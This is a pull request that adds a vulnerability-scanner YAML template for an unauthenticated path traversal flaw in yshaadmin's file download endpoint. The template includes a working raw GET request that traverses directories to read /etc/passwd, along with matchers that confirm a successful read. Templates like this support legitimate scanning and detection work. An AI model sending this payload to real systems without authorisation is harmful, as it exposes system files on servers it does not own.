### PR TITLE
Added yshaadmin path traversal vulnerability

### DIFF
--- a/vulnerabilities/other/yshaadmin-traversal.yaml
+++ b/vulnerabilities/other/yshaadmin-traversal.yaml
@@ -1,0 +1,31 @@
+id: yshaadmin-traversal
+
+info:
+  name: yishaadmin path traversal
+  author: Evan Rubinstein
+  severity: critical
+  description: An endpoint in yshaadmin "/admin/File/DownloadFile" was improperly secured, allowing for files to be downloaded, read or deleted without any authentication.
+  reference: https://huntr.dev/bounties/2acdd87a-12bd-4ce4-994b-0081eb908128/
+  tags: traversal,critical
+
+requests:
+  - raw:
+      - |
+        GET /admin/File/DownloadFile?filePath=wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd&delete=0 HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+        Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
+        Accept-Encoding: gzip, deflate
+        Connection: close
+        Upgrade-Insecure-Requests: 1
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: regex
+        regex: 
+          - "root:.*:0:0"

--- a/vulnerabilities/other/yshaadmin-traversal.yaml
+++ b/vulnerabilities/other/yshaadmin-traversal.yaml
@@ -27,5 +27,5 @@ requests:
           - 200
 
       - type: regex
-        regex: 
+        regex:
           - "root:.*:0:0"


### PR DESCRIPTION
### Template / PR Information
Description: An endpoint in yshaadmin "/admin/File/DownloadFile" was improperly secured, allowing for files to be downloaded, read or deleted without any authentication.

Reference: https://huntr.dev/bounties/2acdd87a-12bd-4ce4-994b-0081eb908128/

### Template Validation
I've validated this template locally?
-No